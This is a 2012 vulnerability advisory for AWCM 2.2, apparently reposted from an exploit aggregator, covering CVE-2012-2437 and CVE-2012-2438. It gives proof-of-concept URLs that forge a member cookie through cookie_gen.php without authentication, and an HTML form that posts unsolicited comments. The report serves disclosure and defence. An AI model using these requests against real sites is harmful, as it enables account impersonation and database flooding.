Lucene search
Sooel Son1337DAY-ID-19708HistoryNov 09, 2012 - 12:00 a.m.
AWCM 2.2 Access Bypass Vulnerability
2012-11-0900:00:00
Sooel Son
0day.today
12
AWCM version 2.2 appears to suffer from cookie forgery and direct access vulnerabilities.
Vulnerability Report AWCM 2.2
CVE-Candidate-ID: CVE-2012-2437, CVE-2012-2438
Issue: Access Control Bug in AWCM 2.2, Anyone can build the cookie and inserts
DB records.
Author: Sooel Son [sonpostman (at) gmail (dot) com]
Source Code: http://sourceforge.net/projects/awcm/
1. Details: CVE-2012-2437
Without going through an authentication procedure, anyone can
forge a cookie, the
pairs of key and value.
Proof of Concept Code: Initiate the following URL request.
http://targethost/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
ex) http://targethost/awcm/cookie_gen.php?
name=awcm_member&content=123456
2. Details CVE-2012-2438
There is no access control protection for adversaries to
insert millions of
comment records on the database on show_video.php and topic.php.
Proof of Concept Code:
[form action=\"http://targethost/awcm/show_video.php?coment=exploit\"
method=\"post\"]
[input type=\"hidden\" name=\"coment\" value=\'insert
uninvited comments 2\' /]
[input type=\"submit\" value=\"Submit\"]
</form>
##########################
Vendor Notification
* Nov 5th: Acknowledge the vendors, but no responses.
# 0day.today [2018-01-03] #Related
packetstorm
packetstorm
AWCM 2.2 Access Bypass
2012-11-08 00:00:00
securityvulns
securityvulns
Vulnerability Report on AWCM 2.2
2012-11-09 00:00:00
nvd
nvd
CVE-2012-2438
2012-11-26 12:45:22
CVE-2012-2437
2012-11-26 12:45:22
cvelist
cvelist
CVE-2012-2437
2012-11-26 11:00:00
CVE-2012-2438
2012-11-26 11:00:00
cve
cve
CVE-2012-2438
2012-11-26 12:45:22
CVE-2012-2437
2012-11-26 12:45:22
exploitdb
exploitdb
prion
prion
Authentication flaw
2012-11-26 12:45:00
Code injection
2012-11-26 12:45:00
Related for 1337DAY-ID-19708